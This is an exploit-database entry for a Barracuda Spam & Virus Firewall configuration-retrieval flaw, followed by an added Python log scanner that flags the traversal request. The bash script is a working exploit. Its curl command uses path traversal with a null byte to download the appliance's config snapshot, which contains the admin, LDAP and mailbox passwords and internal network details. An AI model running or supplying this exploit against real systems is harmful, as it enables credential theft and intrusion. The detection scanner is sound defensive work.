vendor: Spam & Virus Firewall
by: ShadowHatesYou
CVSS: 8,8 HIGH
Remote Configuration Retrieval
CWE: N/A
Product Name: Spam & Virus Firewall
Affected Version From: 4.1.1.021
Affected Version To: 4.1.1.021
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval

This exploit allows an attacker to retrieve the configuration of a Barracuda Networks Spam & Virus Firewall <= 4.1.1.021. The configuration includes the administrative password for the BSF, the MTA LDAP passwords, the password for each configured mailbox, and internal networking information.

Mitigation:

Ensure that the Barracuda Networks Spam & Virus Firewall is up to date with the latest security patches.

Exploit-DB raw data:

#!/bin/bash
# Exploit by ShadowHatesYou
# Shadow@SquatThis.net
#
# The resulting output is an SQL dump containing the Barracuda's configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#
#
# Exploit-DB Notes:
# If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.

if [ $# != 1 ]; then
	echo "# Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval"
	echo "# Use: $0 <host/ip> "
	echo "#"
	exit;
fi;
curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 > $1.config
ls -hl $1.config
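
A defender-side check for the request the script above sends, as an added example that is not part of the original exploit or of any Barracuda tooling: it scans web access log lines for view_help.cgi requests (under /cgi-mod/ or /cgi-bin/) whose locale value carries a NUL byte or ".." path segments. The combined log format, the sample lines and the "en_US"-style allowlist are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2020:00:00:01 +0000] "GET /cgi-mod/view_help.cgi'
    '?locale=/../../../../../../../mail/snapshot/config.snapshot%00 HTTP/1.1" 200 48211',
    '198.51.100.7 - - [01/Jan/2020:00:00:02 +0000] "GET /cgi-bin/view_help.cgi'
    '?locale=/../../../../../../../mail/snapshot/config.snapshot%00 HTTP/1.1" 404 312',
    '192.0.2.10 - - [01/Jan/2020:00:05:00 +0000] "GET /cgi-mod/view_help.cgi'
    '?locale=en_US HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2020:00:05:03 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 200 900',
]
# Assumption: the appliance's web log is in common/combined log format.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
HELP_CGI_RE = re.compile(r'/cgi-(?:mod|bin)/view_help\.cgi')
# Assumption: a legitimate locale value looks like "en_US"; anything else is suspect.
LOCALE_OK_RE = re.compile(r'[A-Za-z]{2,3}(?:[_-][A-Za-z]{2})?')

def fully_decode(value, rounds=3):
    """Percent-decode up to `rounds` times so nested encodings are also seen."""
    for _ in range(rounds):
        value = unquote(value, encoding="latin-1")
    return value

def classify_locale(raw):
    """Return the reasons a raw locale value is suspicious (empty list if benign)."""
    value = fully_decode(raw)
    checks = {"nul-byte": "\x00" in value,
              "dot-dot-segment": ".." in re.split(r"[\\/]", value)}
    reasons = [name for name, hit in checks.items() if hit]
    return reasons or ([] if LOCALE_OK_RE.fullmatch(value) else ["not-a-locale"])

def scan(lines):
    """Yield (source, http_status, reasons) for each flagged view_help.cgi request."""
    for line in lines:
        m = REQUEST_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or not HELP_CGI_RE.fullmatch(fully_decode(url.path)):
            continue
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            if key == "locale" and (why := classify_locale(raw)):
                yield m["src"], int(m["status"]), why

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The HTTP status is returned with each hit so that flagged requests answered with 200 can be reviewed first.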